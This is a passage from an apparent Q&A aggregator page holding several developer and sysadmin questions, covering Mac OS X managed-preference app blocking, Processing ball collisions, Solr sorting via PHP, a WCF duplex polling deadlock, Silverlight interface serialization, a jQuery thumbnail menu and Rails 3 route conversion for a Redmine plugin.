xml -user shortname -group groupname before & after performing the aforementioned process to allow the application in question to be run and the results were identical (saved the result to files & diff'd... I'm not just guessing here). One Step Forward, Half a Step Back: When the Mac OS X 10.6.5 Server update was released, we upgraded our Open Directory Master to it as the changes included the following managed preferences fixes which I hoped might address this issue: Addresses an issue that could prevent managed preferences from being applied when a user logs in on a workstation that has been idle. Fixes an issue that could prevent administrators from bypassing client management settings on a workstation. This seemed to improve the situation slightly. The application in question now usually launches without error. If, and when it does launch with the "You don't have permission to use the application" error, logging the user out and back in seems to correct it. That said, we've since had to add a couple of applications to the user's ~/Applications/ directory and those are still prevented from launching. The workstations are running Mac OS X 10.6.4, the OD Master (which the workstations are bound to) is running Mac OS 10.6.5 Server (although there are two OD Replicas still running 10.6.4 Server), and we're using Workgroup Manager 10.6.3 (which is included with the Server Admin Tools 10.6.5 upgrade) to add the applications (unsigned, as always). This time, I've caught the following in /var/log/system.log when attempting to launch one of the allowed applications from ~/Applications: Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker checkApp:csFlags:] [954:username] -- *** Incoming app appears to be masquerading as white listed app and failed signature validation: /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro. Note: This may be a valid app of a different version than what was whitelisted (on a different volume?) Dec 22 17:36:24 hostname [0x0-0xa42a42].com.filemaker.filemakerpro[43304]: launch of /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro was blocked Dec 22 17:36:24 hostname com.apple.launchd.peruser.1340[6375] ([0x0-0xa42a42].com.filemaker.filemakerpro[43304]): Exited with exit code: 255 Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker(Private) _removeAppFromWhiteList:] [1362:username] -- *** Couldn't find local user record Running sudo mcxquery -format xml -user username -group groupname includes the following entry for FileMaker Pro 5.5 (and appears to include a full integration of the user's application whitelist & group's application whitelist): <dict> <key>bundleID</key> <string>com.filemaker.filemakerpro</string> <key>displayName</key> <string>FileMaker Pro</string> </dict> Note the lack of <key>appID</key><data> ... </data> which seems to specify a signed application. While whitelisted directories also appear to be correctly listed in the results, they too do not actually allow the applications to be run either. What is going on here?! Where else should I be looking?

    Read the article

  • Mass Ball-to-Ball Collision Handling (as in, lots of balls)

    - by BlueThen
    Update: Found out that I was using the radius as the diameter, which was why the mtd was overcompensating. Hi, StackOverflow. I've written a Processing program awhile back simulating ball physics. Basically, I have a large number of balls (1000), with gravity turned on. Detection works great, but my issue is that they start acting weird when they're bouncing against other balls in all directions. I'm pretty confident this involves the handling. For the most part, I'm using Jay Conrod's code. One part that's different is if (distance > 1.0) return; which I've changed to if (distance < 1.0) return; because the collision wasn't even being performed with the first bit of code, I'm guessing that's a typo. The balls overlap when I use his code, which isn't what I was looking for. My attempt to fix it was to move the balls to the edge of each other: float angle = atan2(y - collider.y, x - collider.x); float distance = dist(x,y, balls[ID2].x,balls[ID2].y); x = collider.x + radius * cos(angle); y = collider.y + radius * sin(angle); This isn't correct, I'm pretty sure of that. I tried the correction algorithm in the previous ball-to-ball topic: // get the mtd Vector2d delta = (position.subtract(ball.position)); float d = delta.getLength(); // minimum translation distance to push balls apart after intersecting Vector2d mtd = delta.multiply(((getRadius() + ball.getRadius())-d)/d); // resolve intersection -- // inverse mass quantities float im1 = 1 / getMass(); float im2 = 1 / ball.getMass(); // push-pull them apart based off their mass position = position.add(mtd.multiply(im1 / (im1 + im2))); ball.position = ball.position.subtract(mtd.multiply(im2 / (im1 + im2))); except my version doesn't use vectors, and every ball's weight is 1. The resulting code I get is this: PVector delta = new PVector(collider.x - x, collider.y - y); float d = delta.mag(); PVector mtd = new PVector(delta.x * ((radius + collider.radius - d) / d), delta.y * ((radius + collider.radius - d) / d)); // push-pull apart based on mass x -= mtd.x * 0.5; y -= mtd.y * 0.5; collider.x += mtd.x * 0.5; collider.y += mtd.y * 0.5; This code seems to over-correct collisions. Which doesn't make sense to me because in no other way do I modify the x and y values of each ball, other than this. Some other part of my code could be wrong, but I don't know. Here's the snippet of the entire ball-to-ball collision handling I'm using: if (alreadyCollided.contains(new Integer(ID2))) // if the ball has already collided with this, then we don't need to reperform the collision algorithm return; Ball collider = (Ball) objects.get(ID2); PVector collision = new PVector(x - collider.x, y - collider.y); float distance = collision.mag(); if (distance == 0) { collision = new PVector(1,0); distance = 1; } if (distance < 1) return; PVector velocity = new PVector(vx,vy); PVector velocity2 = new PVector(collider.vx, collider.vy); collision.div(distance); // normalize the distance float aci = velocity.dot(collision); float bci = velocity2.dot(collision); float acf = bci; float bcf = aci; vx += (acf - aci) * collision.x; vy += (acf - aci) * collision.y; collider.vx += (bcf - bci) * collision.x; collider.vy += (bcf - bci) * collision.y; alreadyCollided.add(new Integer(ID2)); collider.alreadyCollided.add(new Integer(ID)); PVector delta = new PVector(collider.x - x, collider.y - y); float d = delta.mag(); PVector mtd = new PVector(delta.x * ((radius + collider.radius - d) / d), delta.y * ((radius + collider.radius - d) / d)); // push-pull apart based on mass x -= mtd.x * 0.2; y -= mtd.y * 0.2; collider.x += mtd.x * 0.2; collider.y += mtd.y * 0.2; Thanks. (Apologies for lack of sources, stackoverflow thinks I'm a spammer)

    Read the article

  • How can I resolve this one application coming up with an "You don't have permission to use the application" error?

    - by morgant
    I've got a Mac OS X 10.6 Snow Leopard Server Open Directory Master with a user who's getting Mobility & Application managed preferences from a group (the only group they're a member of). The workstation is also running Mac OS X 10.6 Snow Leopard, when the user logs in and tries to run our primary application which they're explicitly allowed to run (via the group's preferences), it says "You don't have permission to use the application 'Blah'". Now, the application is added to the group's list of always allowed applications, unsigned (so a minor difference in application version or file contents shouldn't disallow it). It even lives in a subdirectory of /Applications which is in the list of folders to allow applications. I've run into this when logging this user into new workstations and the following usually works: Log them out Remove the following files from their mobile home folder on the workstation: /Library/Managed\ Preferences/, ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist. Remove the following files from their network home folder on the server: ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist. Log them back in on the workstation. However, this no longer resolves the issue. Their Home Sync preferences are set (on the group) to sync ~, but not the following files (manually, at login, and at logout... no background sync here): ~/.SymAVQSFile ~/NAVMac800QSFile ~/Library ~/.FileSync ~/.account Their Preferences Sync preferences are set (also on the group) to sync ~/Library & ~/Documents/Microsoft User Data, but not the following files (also manually, at login, and at logout... no background sync): ~/.SymAVQSFile ~/.Trash ~/.Trashes ~/Documents/Microsoft User Data/Entourage Temp ~/Library/Application Support/SyncServices ~/Library/Application Support/MobileSync ~/Library/Caches ~/Library/Calendars/Calendar Cache ~/Library/Logs ~/Library/Mail/AvailableFeeds ~/Library/Mail/Envelope Index ~/Library/Preferences/Macromedia/ ~/Library/Printers ~/Library/PubSub/Database ~/Library/PubSub/Downloads ~/Library/PubSub/Feeds ~/Library/Safari/Icons.db ~/Library/Safari/HistoryIndex.sk ~/Library/iTunes/iPhone Software Updates IMAP-* Exchange-* EWS-* Mac-* ~/Library/Preferences/ByHost ~/Library/Preferences/com.apple.dock.plist ~/Library/Preferences/com.apple.sitebarlists.plist ~/Library/Application Support/4D ~/Library/Preferences/com.apple.MCX.plist ~/.FileSync ~/.account Even with ~/Library/Preferences/com.apple.MCX.plist prevented from syncing during a Preferences Sync, it still seems to show up in the network home on the server frequently. Are there any other files other than ~/Library/Preferences/com.apple.MCX.plist that contain application Managed Preferences that might be causing this one app to be showing up as not allowed? Any ideas on how ~/Library/Preferences/com.apple.MCX.plist keeps getting sync'd back up the network home folder on the server? Update: I thought I had found a workaround this morning, but it also seemed to be extremely temporary. Basically, loking at /Library/Managed\ Preferences/[shortname]/com.apple.applicationaccess.new.plist I discovered that it didn't have an entry for the application in question, but /Library/Managed\ Preferences/[shortname]/complete.plist did. Naturally, I deleted com.apple.applicationaccess.new.plist, logged in again, and it worked... on one workstation. It failed on others, and after logging out & back in a couple more times it started failing on all of them again, even after further deletions of com.apple.applicationaccess.new.plist. Oddly, com.apple.applicationaccess.new.plist & complete.plist do both contain an entry for the application in question now, but it still says it's not allowed. Further Update: Okay, so I now have a reproducible workaround which seems to be required after every reboot of the workstation: Log in as the user (you'll discover you cannot launch the application in question). Fast User Switch to the local admin account on the workstation (we always have one on every machine). From that local admin account, run sudo mcxrefresh -n 'shortname' (logging out and back in as the user in question will not work). Fast User Switch back to the user (you'll still not be allowed to run the application). Log the user out and back in (you'll now be able to run the application in question.) Fast User Switch back to the local admin account, log it out, and log back in as the user in question. If you do all that exactly as described it'll keep working through log out & log back in, but NOT through a reboot. If, after a reboot, you try something like logging in as the local admin account, running sudo mcxrefresh -n 'shortname', logging out, then logging in as the user in question, it will NOT work. Yet Another Update We don't have any computer groups in our Open Directory, so it shouldn't be getting any conflicting settings from there. I ran sudo mcxquery -format xml -user shortname -group groupname before & after performing the aforementioned process to allow the application in question to be run and the results were identical (saved the result to files & diff'd... I'm not just guessing here). One Step Forward, Half a Step Back: When the Mac OS X 10.6.5 Server update was released, we upgraded our Open Directory Master to it as the changes included the following managed preferences fixes which I hoped might address this issue: Addresses an issue that could prevent managed preferences from being applied when a user logs in on a workstation that has been idle. Fixes an issue that could prevent administrators from bypassing client management settings on a workstation. This seemed to improve the situation slightly. The application in question now usually launches without error. If, and when it does launch with the "You don't have permission to use the application" error, logging the user out and back in seems to correct it. That said, we've since had to add a couple of applications to the user's ~/Applications/ directory and those are still prevented from launching. The workstations are running Mac OS X 10.6.4, the OD Master (which the workstations are bound to) is running Mac OS 10.6.5 Server (although there are two OD Replicas still running 10.6.4 Server), and we're using Workgroup Manager 10.6.3 (which is included with the Server Admin Tools 10.6.5 upgrade) to add the applications (unsigned, as always). This time, I've caught the following in /var/log/system.log when attempting to launch one of the allowed applications from ~/Applications: Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker checkApp:csFlags:] [954:username] -- *** Incoming app appears to be masquerading as white listed app and failed signature validation: /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro. Note: This may be a valid app of a different version than what was whitelisted (on a different volume?) Dec 22 17:36:24 hostname [0x0-0xa42a42].com.filemaker.filemakerpro[43304]: launch of /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro was blocked Dec 22 17:36:24 hostname com.apple.launchd.peruser.1340[6375] ([0x0-0xa42a42].com.filemaker.filemakerpro[43304]): Exited with exit code: 255 Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker(Private) _removeAppFromWhiteList:] [1362:username] -- *** Couldn't find local user record Running sudo mcxquery -format xml -user username -group groupname includes the following entry for FileMaker Pro 5.5 (and appears to include a full integration of the user's application whitelist & group's application whitelist): <dict> <key>bundleID</key> <string>com.filemaker.filemakerpro</string> <key>displayName</key> <string>FileMaker Pro</string> </dict> Note the lack of <key>appID</key><data> ... </data> which seems to specify a signed application. While whitelisted directories also appear to be correctly listed in the results, they too do not actually allow the applications to be run either. What is going on here?! Where else should I be looking?

    Read the article

  • Why wont this sort in Solr work?

    - by Camran
    I need to sort on a date-field type, which name is "mod_date". It works like this in the browser adress-bar: http://localhost:8983/solr/select/?&q=bmw&sort=mod_date+desc But I am using a phpSolr client which sends an URL to Solr, and the url sent is this: fq=+category%3A%22Bilar%22+%2B+car_action%3AS%C3%A4ljes&version=1.2&wt=json&json.nl=map&q=%2A%3A%2A&start=0&rows=5&sort=mod_date+desc // This wont work and is echoed after this in php: $queryString = http_build_query($params, null, $this->_queryStringDelimiter); $queryString = preg_replace('/%5B(?:[0-9]|[1-9][0-9]+)%5D=/', '=', $queryString); This wont work, I dont know why! Everything else works fine, all right fields are returned. But the sort doesn't work. Any ideas? Thanks BTW: The field "mod_date" contains something like: 2010-03-04T19:37:22.5Z EDIT: First I use PHP to send this to a SolrPhpClient which is another php-file called service.php: require_once('../SolrPhpClient/Apache/Solr/Service.php'); $solr = new Apache_Solr_Service('localhost', 8983, '/solr/'); $results = $solr->search($querystring, $p, $limit, $solr_params); $solr_params is an array which contains the solr-parameters (q, fq, etc). Now, in service.php: $params['version'] = self::SOLR_VERSION; // common parameters in this interface $params['wt'] = self::SOLR_WRITER; $params['json.nl'] = $this->_namedListTreatment; $params['q'] = $query; $params['sort'] = 'mod_date desc'; // HERE IS THE SORT I HAVE PROBLEM WITH $params['start'] = $offset; $params['rows'] = $limit; $queryString = http_build_query($params, null, $this->_queryStringDelimiter); $queryString = preg_replace('/%5B(?:[0-9]|[1-9][0-9]+)%5D=/', '=', $queryString); if ($method == self::METHOD_GET) { return $this->_sendRawGet($this->_searchUrl . $this->_queryDelimiter . $queryString); } else if ($method == self::METHOD_POST) { return $this->_sendRawPost($this->_searchUrl, $queryString, FALSE, 'application/x-www-form-urlencoded'); } The $results contain the results from Solr... So this is the way I need to get to work (via php). This code below (also on top of this Q) works but thats because I paste it into the adress bar manually, not via the PHPclient. But thats just for debugging, I need to get it to work via the PHPclient: http://localhost:8983/solr/select/?&q=bmw&sort=mod_date+des // Not via phpclient, but works UPDATE (2010-03-08): I have tried Donovans codes (the urls) and they work fine. Now, I have noticed that it is one of the parameters causing the 'SORT' not to work. This parameter is the "wt" parameter. If we take the url from top of this Q, (fq=+category%3A%22Bilar%22+%2B+car_action%3AS%C3%A4ljes&version=1.2&wt=json&json.nl=map&q=%2A%3A%2A&start=0&rows=5&sort=mod_date+desc), and just simply remove the "wt" parameter, then the sort works. BUT the results appear differently, thus making my php code not able to recognize the results I believe. Donovan would know this I think. I am guessing in order for the PHPClient to work, the results must be in a specific structure, which gets messed up as soon as I remove the wt parameter. Donovan, help me please... Here is some background what I use your SolrPhpClient for: I have a classifieds website, which uses MySql. But for the searching I am using Solr to search some indexed fields. Then Solr returns an array of ID:numbers (for all matches of the search criteria). Then I use those ID:numbers to find everything in a MySql db and fetch all other information (example is not searchable information). So simplified: Search - Solr returns all matches in an array of ID:nrs - Id:numbers from Solr are the same as the Id numbers in the MySql db, so I can just make a simple match agains every record with the ID matching the ID from the Solr results array. I don't use Faceting, no boosting, no relevancy or other fancy stuff. I only sort by the latest classified put, and give the option to users to also sort on the cheapest price. Nothing more. Then I use the "fq" parameter to do queries on different fields in Solr depending on category chosen by users (example "cars" in this case which in my language is "Bilar"). I am really stuck with this problem here... Thanks for all help

    Read the article

  • deadlock when using WCF Duplex Polling with Silverlight

    - by Kobi Hari
    Hi all. I have followed Tomek Janczuk's demonstration on silverlight tv to create a chat program that uses WCF Duplex Polling web service. The client subscribes to the server, and then the server initiates notifications to all connected clients to publish events. The Idea is simple, on the client, there is a button that allows the client to connect. A text box where the client can write a message and publish it, and a bigger text box that presents all the notifications received from the server. I connected 3 clients (in different browsers - IE, Firefox and Chrome) and it all works nicely. They send messages and receive them smoothly. The problem starts when I close one of the browsers. As soon as one client is out, the other clients get stuck. They stop getting notifications. I am guessing that the loop in the server that goes through all the clients and sends them the notifications is stuck on the client that is now missing. I tried catching the exception and removing it from the clients list (see code) but it still does not help. any ideas? The server code is as follows: using System; using System.Linq; using System.Runtime.Serialization; using System.ServiceModel; using System.ServiceModel.Activation; using System.Collections.Generic; using System.Runtime.Remoting.Channels; namespace ChatDemo.Web { [ServiceContract] public interface IChatNotification { // this will be used as a callback method, therefore it must be one way [OperationContract(IsOneWay=true)] void Notify(string message); [OperationContract(IsOneWay = true)] void Subscribed(); } // define this as a callback contract - to allow push [ServiceContract(Namespace="", CallbackContract=typeof(IChatNotification))] [AspNetCompatibilityRequirements(RequirementsMode = AspNetCompatibilityRequirementsMode.Allowed)] [ServiceBehavior(InstanceContextMode=InstanceContextMode.Single)] public class ChatService { SynchronizedCollection<IChatNotification> clients = new SynchronizedCollection<IChatNotification>(); [OperationContract(IsOneWay=true)] public void Subscribe() { IChatNotification cli = OperationContext.Current.GetCallbackChannel<IChatNotification>(); this.clients.Add(cli); // inform the client it is now subscribed cli.Subscribed(); Publish("New Client Connected: " + cli.GetHashCode()); } [OperationContract(IsOneWay = true)] public void Publish(string message) { SynchronizedCollection<IChatNotification> toRemove = new SynchronizedCollection<IChatNotification>(); foreach (IChatNotification channel in this.clients) { try { channel.Notify(message); } catch { toRemove.Add(channel); } } // now remove all the dead channels foreach (IChatNotification chnl in toRemove) { this.clients.Remove(chnl); } } } } The client code is as follows: void client_NotifyReceived(object sender, ChatServiceProxy.NotifyReceivedEventArgs e) { this.Messages.Text += string.Format("{0}\n\n", e.Error != null ? e.Error.ToString() : e.message); } private void MyMessage_KeyDown(object sender, KeyEventArgs e) { if (e.Key == Key.Enter) { this.client.PublishAsync(this.MyMessage.Text); this.MyMessage.Text = ""; } } private void Button_Click(object sender, RoutedEventArgs e) { this.client = new ChatServiceProxy.ChatServiceClient(new PollingDuplexHttpBinding { DuplexMode = PollingDuplexMode.MultipleMessagesPerPoll }, new EndpointAddress("../ChatService.svc")); // listen for server events this.client.NotifyReceived += new EventHandler<ChatServiceProxy.NotifyReceivedEventArgs>(client_NotifyReceived); this.client.SubscribedReceived += new EventHandler<System.ComponentModel.AsyncCompletedEventArgs>(client_SubscribedReceived); // subscribe for the server events this.client.SubscribeAsync(); } void client_SubscribedReceived(object sender, System.ComponentModel.AsyncCompletedEventArgs e) { try { Messages.Text += "Connected!\n\n"; gsConnect.Color = Colors.Green; } catch { Messages.Text += "Failed to Connect!\n\n"; } } And the web config is as follows: <system.serviceModel> <extensions> <bindingExtensions> <add name="pollingDuplex" type="System.ServiceModel.Configuration.PollingDuplexHttpBindingCollectionElement, System.ServiceModel.PollingDuplex, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/> </bindingExtensions> </extensions> <behaviors> <serviceBehaviors> <behavior name=""> <serviceMetadata httpGetEnabled="true"/> <serviceDebug includeExceptionDetailInFaults="false"/> </behavior> </serviceBehaviors> </behaviors> <bindings> <pollingDuplex> <binding name="myPollingDuplex" duplexMode="MultipleMessagesPerPoll"/> </pollingDuplex> </bindings> <serviceHostingEnvironment aspNetCompatibilityEnabled="true" multipleSiteBindingsEnabled="true"/> <services> <service name="ChatDemo.Web.ChatService"> <endpoint address="" binding="pollingDuplex" bindingConfiguration="myPollingDuplex" contract="ChatDemo.Web.ChatService"/> <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange"/> </service> </services> </system.serviceModel>

    Read the article

  • Silverlight/Web Service Serializing Interface for use Client Side

    - by Steve Brouillard
    I have a Silverlight solution that references a third-party web service. This web service generates XML, which is then processed into objects for use in Silverlight binding. At one point we the processing of XML to objects was done client-side, but we ran into performance issues and decided to move this processing to the proxies in the hosting web project to improve performance (which it did). This is obviously a gross over-simplification, but should work. My basic project structure looks like this. Solution Solution.Web - Holds the web page that hosts Silverlight as well as proxies that access web services and processes as required and obviously the references to those web services). Solution.Infrastructure - Holds references to the proxy web services in the .Web project, all genned code from serialized objects from those proxies and code around those objects that need to be client-side. Solution.Book - The particular project that uses the objects in question after processed down into Infrastructure. I've defined the following Interface and Class in the Web project. They represent the type of objects that the XML from the original third-party gets transformed into and since this is the only project in the Silverlight app that is actually server-side, that was the place to define and use them. //Doesn't get much simpler than this. public interface INavigable { string Description { get; set; } } //Very simple class too public class IndexEntry : INavigable { public List<IndexCM> CMItems { get; set; } public string CPTCode { get; set; } public string DefinitionOfAbbreviations { get; set; } public string Description { get; set; } public string EtiologyCode { get; set; } public bool HighScore { get; set; } public IndexToTabularCommandArguments IndexToTabularCommandArgument { get; set; } public bool IsExpanded { get; set; } public string ManifestationCode { get; set; } public string MorphologyCode { get; set; } public List<TextItem> NonEssentialModifiersAndQualifyingText { get; set; } public string OtherItalics { get; set; } public IndexEntry Parent { get; set; } public int Score { get; set; } public string SeeAlsoReference { get; set; } public string SeeReference { get; set; } public List<IndexEntry> SubEntries { get; set; } public int Words { get; set; } } Again; both of these items are defined in the Web project. Notice that IndexEntry implments INavigable. When the code for IndexEntry is auto-genned in the Infrastructure project, the definition of the class does not include the implmentation of INavigable. After discovering this, I thought "no problem, I'll create another partial class file reiterating the implmentation". Unfortunately (I'm guessing because it isn't being serialized), that interface isn't recognized in the Infrastructure project, so I can't simply do that. Here's where it gets really weird. The BOOK project CAN see the INavigable interface. In fact I use it in Book, though Book has no reference to the Web Service in the Web project where the thing is define, though Infrastructure does. Just as a test, I linked to the INavigable source file from indside the Infrastructure project. That allowed me to reference it in that project and compile, but causes havoc in the Book project, because now there's a conflick between the one define in Infrastructure and the one defined in the Web project's web service. This is behavior I would expect. So, to try and sum up a bit. Web project has a web service that process data from a third-party service and has a class and interface defined in it. The class implements the interface. The Infrastructure project references the web service in the Web Project and the Book project references the Infrastructure project. The implmentation of the interface in the class does NOT serialize down, so the auto-genned code in INfrastructure does not show this relationship, breaking code further down-stream. The Book project, whihc is further down-stream CAN see the interface as defined in the Web Project, even though its only reference is through the Infrastructure project; whihc CAN'T see it. Am I simple missing something easy here? Can I apply an attribute to either the Interface definition or to the its implmentation in the class to ensure its visibility downstream? Anything else I can do here? I know this is a bit convoluted and anyone still with me here, thanks for your patience and any advice you might have. Cheers, Steve

    Read the article

  • Trying to create scrolling horizontal thumbnail navigation that hides on left side when not in use

    - by user346602
    Hi, I am trying recreate the following type of scrolling thumbnail navigation as described in the following tutorial: http://tympanus.net/codrops/2010/05/10/scrollable-thumbs-menu/ I require my thumbs to slide out horizontally from the left. I have amended the code to the best of my abilities, but I can't get it to work. (Think the problem is in the top third of the jquery). Here is what I have to date: HTML <ul class="menu" id="menu"> <li> <a href="#"></a> <div class="sc_menu_wrapper"> <div class="sc_menu"> <a href="#"><img src="images/gallery/1.jpg" alt=""/></a> <a href="#"><img src="images/gallery/2.jpg" alt=""/></a> <a href="#"><img src="images/gallery/3.jpg" alt=""/></a> <a href="#"><img src="images/gallery/4.jpg" alt=""/></a> <a href="#"><img src="images/gallery/5.jpg" alt=""/></a> </div> </div> </li> </ul> CSS /* Navigation Style */ ul.menu{ position: fixed; top: 0px; left:0px; width: 100%; } ul.menu li{ position:relative; width: 100% } ul.menu li > a{ position:absolute; top:300px; left:0px; width:40px; height:200px; background-color:#e7e7e8; } /* Thumb Scrolling Style */ div.sc_menu_wrapper { position: absolute; right: 0px; height: 220px; overflow: hidden; top: 300px; left:0px; visibility:hidden; } div.sc_menu { height: 200px; visibility:hidden; } .sc_menu a { display: block; background-color:#e7e7e8; } .sc_menu img { display: block; border: none; opacity:0.3; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=30); } JQUERY $(function(){ // function to make the thumbs menu scrollable function buildThumbs($elem){ var $wrapper = $elem.next(); var $menu = $wrapper.find('.sc_menu'); var inactiveMargin = 220; // move the scroll down to the beggining (move as much as the height of the menu) $wrapper.scrollRight($menu.outerHeight()); //when moving the mouse up or down, the wrapper moves (scrolls) up or down $wrapper.bind('mousemove',function(e){ var wrapperWidth = $wrapper.width(); var menuWidth = $menu.outerWidth() + 2 * inactiveMargin; var top = (e.pageX - $wrapper.offset().right) * (menuWidth - wrapperWidth) / wrapperWidth - inactiveMargin; $wrapper.scrollRight(right+10); }); } var stacktime; $('#menu li > a').bind('mouseover',function () { var $this = $(this); buildThumbs($this); var pos = $this.next().find('a').size(); var f = function(){ if(pos==0) clearTimeout(stacktime); $this.next().find('a:nth-child('+pos+')').css('visibility','visible'); --pos; }; // each thumb will appear with a delay stacktime = setInterval(f , 50); }); /// on mouseleave of the whole <li> the scrollable area is hidden $('#menu li').bind('mouseleave',function () { var $this = $(this); clearTimeout(stacktime); $this.find('.sc_menu').css('visibility','hidden').find('a').css('visibility','hidden'); $this.find('.sc_menu_wrapper').css('visibility','hidden'); }); // when hovering a thumb, change its opacity $('.sc_menu a').hover( function () { var $this = $(this); $this.find('img') .stop() .animate({'opacity':'1.0'},400); }, function () { var $this = $(this); $this.find('img') .stop() .animate({'opacity':'0.3'},400); } ); }); Wondering if some eagle eye might be able to point out where I am going wrong. As my knowledge of JQuery is limited, I'm guessing it is in there. I really appreciate anyone taking the time to look this over. Thank you!

    Read the article

  • What do I need to change to get this 'acts_as_rateable' Rails plugin working with this code from the

    - by tepidsam
    Hello! I'm working my way through the 'Foundation Rails 2' book. In Chapter 9, we are building a little "plugins" app. In the book, he installs the acts_as_rateable plugin found at http://juixe.com/svn/acts_as_rateable. This plugin doesn't appear to exist in 2010 (the page for this "old" plugin seems to be working again...it was down when I tried it earlier), so I found another acts_as_rateable plugin at http://github.com/azabaj/acts_as_rateable. These plugins are different and I'm trying to get the "new" plugin working with the code/project/app from the Foudations 2 book. I was able to use the migration generator included with the "new" plugin and it worked. Now,though, I'm a bit confused. In the book, he has us create a new controller to work with the plugin (the old plugin). Here's the code for that: class RatingsController < ApplicationController def create @plugin = Plugin.find(params[:plugin_id]) rating = Rating.new(:rating => params[:rating]) @plugin.ratings << average_rating redirect_to @plugin end end Then he had us change the routing: map.resources :plugins, :has_many => :ratings map.resources :categories map.root :controller => 'plugins' Next, we modified the following to the 'show' template so that it looks like this: <div id="rate_plugin"> <h2>Rate this plugin</h2> <ul class="star-rating"> <li> <%= link_to "1", @plugin.rate_it(1), :method => :post, :title => "1 star out of 5", :class => "one-star" %> </li> <li> <%= link_to "2", plugin_ratings_path(@plugin, :rating => 2), :method => :post, :title => "2 stars out of 5", :class => "two-stars" %> </li> <li> <%= link_to "3", plugin_ratings_path(@plugin, :rating => 3), :method => :post, :title => "3 stars out of 5", :class => "three-stars" %> </li> <li> <%= link_to "4", plugin_ratings_path(@plugin, :rating => 4), :method => :post, :title => "4 stars out of 5", :class => "four-stars" %> </li> <li> <%= link_to "5", plugin_ratings_path(@plugin, :rating => 5), :method => :post, :title => "5 stars out of 5", :class => "five-stars" %> </li> </ul> </div> The problem is that we're using code for a different plugin. When I try to actually "rate" one of the plugins, I get an "unknown attribute" error. That makes sense. I'm using attribute names for the "old" plugin, but I should be using attributes names for the "new" plugin. The problem is...I've tried using a variety of different attribute names and I keep getting the same error. From the README for the "new" plugin, I think I should be using some of these but I haven't been able to get them working: Install the plugin into your vendor/plugins directory, insert 'acts_as_rateable' into your model, then restart your application. class Post < ActiveRecord::Base acts_as_rateable end Now your model is extended by the plugin, you can rate it ( 1-# )or calculate the average rating. @plugin.rate_it( 4, current_user.id ) @plugin.average_rating #=> 4.0 @plugin.average_rating_round #=> 4 @plugin.average_rating_percent #=> 80 @plugin.rated_by?( current_user ) #=> rating || false Plugin.find_average_of( 4 ) #=> array of posts See acts_as_rateable.rb for further details! I'm guessing that I might have to make some "bigger" changes to get this plugin working. I'm asking this question to learn and only learn. The book gives code to get things working with the old plugin, but if one were actually building this app today it would be necessary to use this "new" plugin, so I would like to see how it could be used. Cheers! Any ideas on what I could change to get the "new" plugin working?

    Read the article

  • Trouble Upgrading Rails 2 Routes for a Redmine Plugin

    - by user1858628
    I am trying to get a Redmine plugin designed for Rails 2 to work with Rails 3. https://github.com/dalyons/redmine-todos-scrum-plugin I've pretty much fixed most parts, but having no success whatsoever in getting the routes to work. The original routes for Rails 2 are as follows: map.resources :todos, :name_prefix => 'project_', :path_prefix => '/projects/:project_id', :member => {:toggle_complete => :post }, :collection => {:sort => :post} map.resources :todos, :name_prefix => 'user_', :path_prefix => '/users/:user_id', :controller => :mytodos, :member => {:toggle_complete => :post }, :collection => {:sort => :post} map.my_todos 'my/todos', :controller => :mytodos, :action => :index map.connect 'projects/:project_id/todos/show/:id', :controller => "todos", :action => "show" rake routes outputs the following: sort_project_todos POST /projects/:project_id/todos/sort(.:format) {:controller=>"todos", :action=>"sort"} project_todos GET /projects/:project_id/todos(.:format) {:controller=>"todos", :action=>"index"} POST /projects/:project_id/todos(.:format) {:controller=>"todos", :action=>"create"} new_project_todo GET /projects/:project_id/todos/new(.:format) {:controller=>"todos", :action=>"new"} toggle_complete_project_todo POST /projects/:project_id/todos/:id/toggle_complete(.:format) {:controller=>"todos", :action=>"toggle_complete"} edit_project_todo GET /projects/:project_id/todos/:id/edit(.:format) {:controller=>"todos", :action=>"edit"} project_todo GET /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"show"} PUT /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"update"} DELETE /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"destroy"} sort_user_todos POST /users/:user_id/todos/sort(.:format) {:controller=>"mytodos", :action=>"sort"} user_todos GET /users/:user_id/todos(.:format) {:controller=>"mytodos", :action=>"index"} POST /users/:user_id/todos(.:format) {:controller=>"mytodos", :action=>"create"} new_user_todo GET /users/:user_id/todos/new(.:format) {:controller=>"mytodos", :action=>"new"} toggle_complete_user_todo POST /users/:user_id/todos/:id/toggle_complete(.:format) {:controller=>"mytodos", :action=>"toggle_complete"} edit_user_todo GET /users/:user_id/todos/:id/edit(.:format) {:controller=>"mytodos", :action=>"edit"} user_todo GET /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"show"} PUT /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"update"} DELETE /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"destroy"} my_todos /my/todos {:controller=>"mytodos", :action=>"index"} /projects/:project_id/todos/show/:id {:controller=>"todos", :action=>"show"} The nearest I have got for Rails 3 is follows: scope '/projects/:project_id', :name_prefix => 'project_' do resources :todos, :controller => 'todos' do member do post :toggle_complete end collection do post :sort end end end scope '/users/:user_id', :name_prefix => 'user_' do resources :todos, :controller => 'mytodos' do member do post :toggle_complete end collection do post :sort end end end match 'my/todos' => 'mytodos#index', :as => :my_todos match 'projects/:project_id/todos/show/:id' => 'todos#show' rake routes outputs the following: toggle_complete_todo POST /projects/:project_id/todos/:id/toggle_complete(.:format) todos#toggle_complete {:name_prefix=>"project_"} sort_todos POST 